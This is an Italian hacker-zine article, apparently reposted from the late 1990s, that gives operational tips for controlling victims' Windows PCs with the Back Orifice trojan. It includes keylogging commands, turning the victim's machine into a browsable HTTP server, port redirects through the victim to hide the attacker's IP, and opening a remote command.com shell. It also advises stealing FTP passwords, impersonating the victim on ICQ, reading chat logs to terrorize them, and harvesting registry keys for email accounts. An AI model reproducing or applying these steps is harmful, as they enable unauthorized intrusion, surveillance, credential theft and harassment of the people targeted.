Copy Link
Add to Bookmark
Report

Back Orifice - Tips & Tricks

hacker's profile picture
Published in 
Spippolatori
 · 7 Mar 2019

 

Gli ____ _ ___ ___ __ ______ ____00-00-
/ __/__ (_) _ \/ _ \___ / / ___ /_ __/__ ____/ _/ ASCII
_\ \/ _ \/ / ___/ ___/ _ \/ /_/ _ `// / / _ \/ __// / by
/___/ .__/_/_/ /_/ \___/____|_,_//_/ \___/_/ /___/RigoR Mortem
/_/


Presentano: Back Orifice - Tips & Tricks

Creato da : x-h4ck3r

In questa pagina trovi trucchetti, segreti e suggerimenti per utilizzare al
meglio Back Orifice, derivanti dall'esperienza mia e della gente che ha qui
contribuito.

MOLTO PROBABILMENTE TROVERAI ALCUNI TRUCCHETTI CHE POSSONO ESSERE ILLEGALI!!!

RICORDA: IL RESPONSABILE DI OGNI COSA CHE FARAI USANDO QUANTO C'E' SCRITTO IN
QUESTE PAGINE SEI SOLO ED ESCLUSIVAMENTE TU!!! IO E LA GENTE CHE HA SCRITTO IN
QUESTA PAGINA NON CI ASSUMIAMO NESSUNA RESPONSABILITA'! LO FACCIAMO SOLO A SCOPO
EDUCATIVO! NON FARE DANNI A NESSUNO! AL MASSIMO DIVERTITI CON I TUOI AMICI!
CHIARO?

UOMO AVVISATO ....

IO MI LIMITO A RIPORTARE CIO' CHE LA GENTE MI MANDA E CIO' CHE TROVO GIRONZOLANDO
QUA E LA' IN INTERNET, SENZA FARE NESSUNA SELEZIONE E/O CENSURA!!!



1. Info tecniche:

Tutti i programmi del pacchetto di BO sono scritti in C++ e compilati con il
Microsoft Visual C++; sono eseguibili PE (Portable Executable), quindi possono
essere eseguiti solo sotto Win32.

I comandi vengono trasmessi criptati ed iniziano con la stringa: *!*QWTY?

Tutte le comunicazioni tra il client ed il server utilizzano il protocollo UDP
(User Datagram Protocol). Tutti i dati trasmessi e ricevuti vengono criptati,
anche se IIS X-Force Ë in grado di decriptare le richieste del server senza
conoscere la password ed usa i dati raccolti per generare una password che lavora
sul server.

2. Puoi trovare i plugin per BO a questo indirizzo:
http://www.cultdeadcow.com/tools/bo_plugins.html

3. Per vedere cosa viene digitato sulla tastiera del server si usa il comando
Keylog begin.

Volendo si puÚ avviarlo e poi disconnettersi dal server. PoichË Ë un'applicazione
che gira sul server, continuer‡ a registrare sinchË non lo arrestiamo noi o
sinchË il server non si riavvia (per un motivo qualsiasi); quindi possiamo
ritornarci anche dopo molto tempo per vederne il log dal momento in cui l'abbiamo
avviato. Per controllare se il server sta ancora loggando i tasti, possiamo
sfruttare la risposta del server: diamo nuovamente il comando Keylog begin sullo
stesso file log; se il server risponde con "Logging keys" vuol dire che la
registrazione Ë stata interrotta (molto probabilmente a causa di un riavvio del
server!!!); se invece ci risponde con "Logging in process" vuol dire che il
server sta ancora registrando.

4. Per utilizzare al meglio la funzione di keylogging:

quando si usa il comando Keylog begin (specificando il nome del file di log), il
file viene salvato sul server! Per poterlo vedere, o sospendi il Keylog e
trasferisci il file dal server al client (con una procedura un po' macchinosa),
oppure si segue questa procedura che permette di vederlo quasi in tempo reale,
senza digitare un solo tasto, ma muovendosi solo con il mouse!

- dopo aver dato inizio al logging puoi vedere in qualsiasi momento tutti i
caratteri digitati usando il comando File view lasciando gli stessi parametri di
Keylog begin

- se il file diventa subito di grandi dimensioni, lo puoi cancellare con File
Delete e gli stessi parametri di Keylog begin, senza interrompere la
registrazione; puoi cosÏ continuare a vedere i nuovi caratteri digitati con il
File view.

Puoi anche aprire un client BO solo per il keylogging e con File view, File
delete ... File view, File delete vedi cosa viene digitato sulla tastiera del
server.

5. TCP send - TCP receive - NETCAT: ... coming soon† ;-P ...

6. Server HTTP.

Puoi trasformare il server BO in un server HTTP che ascolta su una porta da te
specificata: invia il comando HTTP Enable specificando la porta e la root; apri
un browser e scrivi nel campo indirizzo, l'indirizzo IP del server seguito da due
punti (:) ed il numero di porta su cui hai settato il server HTTP (se usi la
porta 80 Ë sufficiente scrivere solo l'indirizzo IP). In questo modo vedi la root
del server e puoi sfruttare il browser per navigare nelle sue directory, stando
attento ad usare la slash (/), non la backslash (\)!!! (by RigoR MorteM e Il
Santo)

P.S.: a me non funziona!!! non riesco ad uscire dalla root! (Ho usato IE4 e
Navigator 4.04) x-h4ck3r

7. Directory.

Nel client GUI, se usi Directory create, nel primo campo parametri (quello di
sinistra), benchË appaia la dicitura Unused (Ë un errore!) devi specificare il
percorso completo della directory che vuoi creare. Per poter cancellare una
directory con il comando Directory remove Ë necessario che questa sia vuota,
altrimenti .... non la cancella! Questo comando corrisponde a rd del DOS, non a
deltree. (by RigoR MorteM)


8. Come scovare la password e le impostazioni di un server BO.

Con un editor di testi, visualizza il file del server. Se l'ultima linea del file
È:

8 8$8(8,8084888<8@8D8H8L8P8T8X8\8'8d8h8l8

allora il server Ë impostato con i valori di default, altrimenti la
configurazione si trover‡ nelle ultime linee nel seguente ordine:

<nome_del_file>

<descrizione_nel_reginstro>

<numero di porta>

<password>

<informazioni opzionali sul plugin>

9. BO server funziona solo su macchine Windows 95/98, non su Windowss NT (per il
momento!)



10. IRC, usando ildns del suo computer (da un sito americano)

Questo trucchetto Ë utile se sei bannato da tutte le room.Tieni presenti che se
lui si disconnette tu riceverai il messaggio "Connection reset by Peer"..Strano ,
eh, dal momento che la vittima non Ë un peer ? e la tua connessione Ë resettata
dal computer "boserverizzato" ;-)
1. Trova il server IRC che stai usando. In questo esempio io uso
irc.blackened.com
2. Trova il DNS del server dando il comando "/dns irc.blackened.com" nella barra
di stato del client irc che usi
3. Adesso devi fare il setup del suo pc in questo modo:
-usando boclient, scrivi: rediradd 1001 198.182.76.5:6667
Nota bene che 1001 Ë la porta del suo comp che noi abbiamo aperto, il nostro
gateway.L' ip 198.182.76.5 Ë l'ip del server irc irc.blackened.com's e :6667 Ë la
porta che usiamo per connetterci a irc.blackened.com.
-usando invece bogui: scegli "Redir Add" nel box dei comandi. Come parametro per
"In port" inserisci il numero "1001". E nel box "Out ip:port" scrivi l'ip del
sever irc , in questo caso 198.182.76.5:6667. Poi clika send.
3. Adesso nel tuo client IRC, scrivi /server xxx.xxx.xxx.xxx:1001 dove
xxx.xxx.xxx.xxx Ë l'ip della vittima boserverizzata. CiÚ ti connette in realt‡ al
suo pc e da lÏ viene instradato al server irc. Puoi usare lo stesso trucchetto
per la navigazione del web , basta solo il dns della pagina che vuoi !
(traduzione a cura di RigoR MorteM)



11. Cambia lo sfondo di Windows (da un sito americano)

heh. Questo Ë un giochetto carino da fare!
Specialmente se Ë una persona un pochino timorosa che , all'improvviso si
ritrova lo sfondo del desktop con una scritta tipo : "hacking in corso"
L'importnte Ë che l'immagine deve essere in fomato bmp!!!
Usando boclient:
Apri il server http dando questo comando: "httpon 80 c:"
Apri il tuo browser e , nella barra degli indirizzi scrivi
http://xxx.xxx.xxx.xxx:80 logicamente xxx.xxx.xxx.xxx Ë l'ip della vittima.Vai
nella cartella di windows e scarica il suo win.ini.Fai l'upload dell'immagine che
vuoi usare come sfondo. Apri con il tuo editor di testo preferito il files che
hai scaricato e cerca questa stringa di valori:

[Desktop]
Wallpaper=D:\IDADAC~1.BMP
TileWallpaper=0
WallpaperStyle=0
Pattern=(None)

Cambia "Wallpaper=D:\IDADAC~1.BMP" con il percorso dell'immagine che hai mandato
alla vittima includendo il percorso
Mada il win.ini cosÏ modificato e hai finito!
Usando bogui:
Apri il server http scegliendo "HTTP Enable" come comando , nel box "Port" metti
"80" e come root "c:" Ricordati di levare le virgolette! Apri il tuo browser e
vai a http://xxx.xxx.xxx.xxx:80 logicamente xxx.xxx.xxx.xxx Ë il suo ip.Vai nella
cartella di windows , scarica win.ini e fai l''upload del files che vuoi usare
come sfondo.Per il resto del processo riferisciti alle righe precedenti!
(traduzione a cura di RigoR MorteM)


12. Modifiche carine da fare From MindsEye... (da un sito americano)

- Rimpiazza logo.sys, logow.sys and logos.sys con delle versioni un pochino
modificate a seconda dei tui gusti. Ricorda che le immagini devono essere bitmap
di misura 320 per 400 a 256 colori e non devono obbligatoriamente superare 1
250Kb!!!
- In system.ini cambia shell=explorer.exe to shell=progman.exe ed otterrai la
gui di windows 3.11
- Cambia il suo nick nel files Mirc.ini con qualche soprannome carino a tuo
gradimento..
- Leggi I suoi log di mirc ed usa le info che trovi per terrorizzarlo...
- Prendi il file tree.dat dalla dir di cuteFTP ed usa le sua pass per modificare
le sue pagine web o, meglio, cambiagli le pass...
- Prendi il suo UIN dalla dir programmi/icq/uin/ e manda dei messaggi a nome
suo...
E, naturalmente, divertiti! (traduzione a cura di RigoR MorteM)


13. Egodeath (da un sito americano)

Per entrare nelle pagine web di un utente di AOL senza essere annoiati dalla
richiesta di password

rediradd 666 members.aol.com:21
Per nascondere il tuo IP
Poi ftp su xxx.xxx.xxx.xxx:666
Dove xxx.xxx.xxx.xxx Ë l'ip del boserverizzato e vai! Accesso anonimo.
(traduzione a cura di RigoR MorteM)


14. Doc Holibyte (da un sito americano)

Se ti interessa vedere chi fa lo scan della tua subnet carica Nuke Nabber 2 e
configuralo in modo tale che monitorizzi la porta UDP 31337. CiÚ ha anche
un'altro scopo: se hai boserv nessuno puÚ entrare senza che tu lo sappia e , come
bonus, sai anche chi sta facendo lo scan della subnet!
-courtesy: Doc Holibyte, Terrorbyte Tex and Sneaky Pete of the Parasite Posse
(pP)

Nota: Cerca di tenere a mente le ragionier cui cDC hanno creato BO. Non andare in
giro a distruggere gli Hard Disk di persone innocenti! E' sufficiente che
sappiano che sono stati hackati. :)

Lunga vita a cDc! (traduzione a cura di RigoR MorteM)


15. #boskillz (da un sito americano)

for anonimousity: rediradd 666 (new-bo-server-ip):31337, then BO to 666

16. ||korn|| (da un sito americano)

Usando il client dos puoi usare telnet con l'ip del boserverizzato semplicemente
usando questa riga di coando:
appadd command.com 23
E poi ti colleghi via telnet al suo ip (traduzione a cura di RigoR MorteM)

17. hukx (da un sito americano)

Apri la dir di Netscape e scarica il files pref.js. Edita il testo con Notepad o
similari e cambia la pagina di avvio predefinita con la pagina che pi˘ ti
aggrada...
Salva il files e fanne l'upload. w00t (traduzione a cura di RigoR MorteM)


18. ecco alcune chiavi utili per avere maggiori info Comando "Reg list keys"

HKEY_CURRENT_USER\Software\Microsoft\Internet Mail and News\Mail\POP3 [nome del
server]* Comando "Reg list values"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion [Info sistema e
utente] HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info [Info
utente] HKEY_LOCAL_MACHINE\SOFTWARE\CDI\UserInfo [Info utente]
HKEY_CURRENT_USER\Software\Microsoft\User Location Service\Client [Info utente -
NetMeeting] HKEY_CURRENT_USER\Software\Microsoft\Internet Mail and
News\Mail\POP3\(nome del server)* [Info E-mail]
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000001-2-
ecc. [Info E-mail, Accesso remoto ecc.]

Ciao a tutti... ...IBM - International Business Man - IBM kuga69@hotmail.com




19. K-OS (da un sito americano)

Qui vi riporto un semplicissimo files batch che vi permette di filtrare gli
"sweeps" o scan delle subnet usando bogui, ottenendo solo la lista degli ip che
rispondono :

////////////// cut here /////////////////////

@echo off
find "*** site found: " %1 /i >> FILTERED.txt

///////////// cut here /////////////////////

USAGE: Filter <Sweeplog> (traduzione a cura di RigoR MorteM)

.† .... che aspetti? mandami un suggerimento!

x-h4ck3r - SPP member

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT